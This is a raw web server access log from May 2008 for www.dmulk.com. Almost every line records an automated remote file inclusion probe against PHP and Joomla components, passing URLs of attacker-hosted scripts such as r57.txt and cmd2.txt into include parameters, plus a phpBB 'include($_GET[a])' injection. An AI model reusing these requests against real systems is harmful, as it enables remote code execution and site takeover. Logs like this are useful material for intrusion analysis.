81.169.182.59 - - [16/May/2008:10:00:57 -0700] "GET /logs/access_080220.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:01:22 -0700] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:01:22 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:01:22 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:10:01:29 -0700] "GET /logs/access_080119.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:10:01:35 -0700] "GET //?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:10:01:36 -0700] "GET /logs/access_080313.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:10:01:36 -0700] "GET /logs//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:38 -0700] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:38 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:38 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:38 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:38 -0700] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:38 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:38 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:38 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:39 -0700] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:39 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:40 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [16/May/2008:10:01:40 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:10:02:02 -0700] "GET /logs/index.php?incl=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:10:02:05 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:10:02:08 -0700] "GET /index.php?incl=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:10:02:28 -0700] "GET /logs/access_080215.log/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:10:02:28 -0700] "GET /logs/access_080215.log/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:10:02:28 -0700] "GET /page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:10:02:28 -0700] "GET /page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:10:02:28 -0700] "GET /logs/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:10:02:28 -0700] "GET /logs/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.166.170.76 - - [16/May/2008:10:02:40 -0700] "GET /logs/access_080215.log/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.166.170.76 - - [16/May/2008:10:02:40 -0700] "GET /page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.166.170.76 - - [16/May/2008:10:02:40 -0700] "GET /logs/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:10:02:42 -0700] "GET /logs/access_080127.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:10:03:10 -0700] "GET /logs/access.log/index.php?page=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:10:03:15 -0700] "GET /logs/index.php?incl=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:10:03:16 -0700] "GET /logs/index.php?page=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:10:03:17 -0700] "GET /index.php?page=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:10:03:21 -0700] "GET /index.php?incl=http://www.segredodoslivros.com/images/images? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:03:24 -0700] "GET /logs/access_080215.log/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:03:24 -0700] "GET /page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:03:30 -0700] "GET /logs/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:03:33 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:10:03:34 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:10:03:34 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:03:38 -0700] "GET /logs/index.php?pagina=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:03:39 -0700] "GET /index.php?pagina=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
194.177.96.168 - - [16/May/2008:10:03:58 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.177.96.168 - - [16/May/2008:10:03:59 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.49.246 - - [16/May/2008:10:04:29 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
221.143.49.246 - - [16/May/2008:10:04:29 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:10:04:32 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:10:04:32 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:10:04:33 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:10:05:00 -0700] "GET /logs/index2.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:10:05:14 -0700] "GET /retreat1/webcam/retreat1_00686.jpg HTTP/1.1" 200 16007 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:05:30 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.187.25.20 - - [16/May/2008:10:05:54 -0700] "GET /logs/access_080218.log//claroline/auth/ldap/authldap.php?includePath=http://cogu.iespana.es/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:06:04 -0700] "GET /logs/access_080117.log/test.php?page=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:06:05 -0700] "GET /test.php?page=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:06:05 -0700] "GET /logs/test.php?page=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:10:06:10 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:06:23 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:06:23 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:06:23 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:10:06:34 -0700] "GET /logs/access_080331.log/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:10:06:34 -0700] "GET /logs/access_080331.log/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.166.170.76 - - [16/May/2008:10:06:41 -0700] "GET /logs/access_080331.log/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:10:06:52 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:10:06:52 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:07:15 -0700] "GET /logs/access_080211.log/test.php?page=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:07:20 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:07:21 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:07:21 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:07:49 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:07:49 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:07:49 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:10:07:51 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:10:07:51 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:10:07:52 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:10:08:34 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:10:09:34 -0700] "GET /logs/access_080327.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:10:09:34 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:10:09:36 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:10:09:36 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:09:39 -0700] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:10:09:39 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:10:09:44 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:09:45 -0700] "GET /logs/access_080331.log/page.php?doc=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:10:09:49 -0700] "GET /index3.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:10:09:49 -0700] "GET /logs/index3.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
221.143.49.246 - - [16/May/2008:10:09:56 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
221.143.49.246 - - [16/May/2008:10:10:00 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 200 4139 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:10:10:00 -0700] "GET /logs/index.php?incl=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:10:10:11 -0700] "GET /index.php?incl=http://nozyk.org/rob.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:10:10:29 -0700] "GET /logs/access_080308.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:10:10:35 -0700] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:10:35 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:10:10:36 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:10:10:36 -0700] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:10:10:36 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.222.27.201 - - [16/May/2008:10:11:23 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mamont-krr.ru/upload/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.91.118.150 - - [16/May/2008:10:11:49 -0700] "GET /default.php?page=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
80.91.118.150 - - [16/May/2008:10:11:49 -0700] "GET /logs/default.php?page=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
83.222.27.201 - - [16/May/2008:10:11:50 -0700] "GET /logs/access_080214.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mamont-krr.ru/upload/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.27.201 - - [16/May/2008:10:11:50 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mamont-krr.ru/upload/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.209.212 - - [16/May/2008:10:12:02 -0700] "GET /logs/index.php?option=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
80.82.209.212 - - [16/May/2008:10:12:08 -0700] "GET /index.php?option=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
216.246.77.203 - - [16/May/2008:10:12:27 -0700] "GET /logs/home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [16/May/2008:10:12:27 -0700] "GET /home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:10:12:42 -0700] "GET /logs/access_080225.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
